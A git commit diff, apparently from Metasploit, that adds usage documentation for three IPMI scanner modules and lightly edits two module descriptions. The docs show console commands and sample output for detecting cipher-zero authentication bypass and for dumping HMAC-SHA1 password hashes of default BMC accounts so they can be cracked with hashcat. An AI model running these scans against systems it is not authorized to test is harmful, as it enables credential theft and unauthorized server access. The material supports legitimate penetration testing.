add module documentation
parent
46c7e822c8
commit
6f70efcfa1
|
@ -0,0 +1,20 @@
|
||||||
|
The ipmi_cipher_zero module is used to find IPMI 2.0-compatible systems that are vulnerable to an authentication bypass vulnerability through the use of IPMI cipher zero, which means no cipher is used at all.
|
||||||
|
|
||||||
|
## Vulnerable Devices
|
||||||
|
|
||||||
|
This is an error in the IPMI 2.0 specification itself, so any device BMC fully implementing IPMI 2.0 will possibly have the vulnerable non-cipher enabled.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
Set RHOSTS to the target device or range and run:
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
|
||||||
|
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 192.168.1.2
|
||||||
|
RHOSTS => 192.168.1.2
|
||||||
|
msf auxiliary(ipmi_cipher_zero) > run
|
||||||
|
|
||||||
|
[*] Sending IPMI requests to 192.168.1.2->192.168.1.2 (1 hosts)
|
||||||
|
[*] 192.168.1.2:623 - IPMI - NOT VULNERABLE: Rejected cipher zero with error code 17
|
||||||
|
|
||||||
|
```
|
|
@ -0,0 +1,34 @@
|
||||||
|
The ipmi_dumphashes module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
|
||||||
|
|
||||||
|
## Vulnerable Devices
|
||||||
|
|
||||||
|
Any IPMI 2.0 device implementing the RAKP protocol according to the IPMI specification is vulnerable. This is a design flaw rather than a vendor-specific vulnerability.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
Set RHOSTS to the target device or range and run:
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
|
||||||
|
msf auxiliary(ipmi_dumphashes) > set RHOSTS 192.168.1.2
|
||||||
|
RHOSTS => 192.168.1.2
|
||||||
|
msf auxiliary(ipmi_dumphashes) > run
|
||||||
|
|
||||||
|
[*] 192.168.1.2:623 - IPMI - Sending IPMI probes
|
||||||
|
[*] 192.168.1.2:623 - IPMI - Trying username 'ADMIN'...
|
||||||
|
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username ADMIN: Unauthorized name
|
||||||
|
[*] 192.168.1.2:623 - IPMI - Trying username 'admin'...
|
||||||
|
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username admin: Unauthorized name
|
||||||
|
[*] 192.168.1.2:623 - IPMI - Trying username 'root'...
|
||||||
|
[+] 192.168.1.2:623 - IPMI - Hash found: root:redacted
|
||||||
|
[*] 192.168.1.2:623 - IPMI - Trying username 'Administrator'...
|
||||||
|
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username Administrator: Unauthorized name
|
||||||
|
[*] 192.168.1.2:623 - IPMI - Trying username 'USERID'...
|
||||||
|
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username USERID: Unauthorized name
|
||||||
|
[*] 192.168.1.2:623 - IPMI - Trying username 'guest'...
|
||||||
|
[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username guest: Unauthorized name
|
||||||
|
[*] 192.168.1.2:623 - IPMI - Trying username ''...
|
||||||
|
[+] 192.168.1.2:623 - IPMI - Hash found: redacted
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
|
@ -0,0 +1,21 @@
|
||||||
|
The ipmi_version module is used to identify the version of the IPMI specification implemented by devices on a network.
|
||||||
|
|
||||||
|
## Target Devices
|
||||||
|
|
||||||
|
Any exposed device that implements the IPMI specification should work with this module. This is a recon module rather than an exploitation module.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
Set RHOSTS to the target device or range and run:
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/ipmi/ipmi_version
|
||||||
|
msf auxiliary(ipmi_version) > set RHOSTS 192.168.1.2
|
||||||
|
RHOSTS => 192.168.1.2
|
||||||
|
msf auxiliary(ipmi_version) > run
|
||||||
|
|
||||||
|
[*] Sending IPMI requests to 192.168.1.2->192.168.1.2 (1 hosts)
|
||||||
|
[*] 192.168.1.2:623 - IPMI - Probe sent
|
||||||
|
[+] 192.168.1.2:623 - IPMI - IPMI-2.0 OEMID:180010 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
|
||||||
|
|
||||||
|
```
|
|
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
super(
|
super(
|
||||||
'Name' => 'IPMI 2.0 Cipher Zero Authentication Bypass Scanner',
|
'Name' => 'IPMI 2.0 Cipher Zero Authentication Bypass Scanner',
|
||||||
'Description' => %q|
|
'Description' => %q|
|
||||||
This module identifies IPMI 2.0 compatible systems that are vulnerable
|
This module identifies IPMI 2.0-compatible systems that are vulnerable
|
||||||
to an authentication bypass vulnerability through the use of cipher
|
to an authentication bypass vulnerability through the use of cipher
|
||||||
zero.
|
zero.
|
||||||
|,
|
|,
|
||||||
|
|
|
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
super(
|
super(
|
||||||
'Name' => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval',
|
'Name' => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval',
|
||||||
'Description' => %q|
|
'Description' => %q|
|
||||||
This module identifies IPMI 2.0 compatible systems and attempts to retrieve the
|
This module identifies IPMI 2.0-compatible systems and attempts to retrieve the
|
||||||
HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a
|
HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a
|
||||||
file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb
|
file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb
|
||||||
in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
|
in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
|
||||||
|
|
Loading…
Reference in New Issue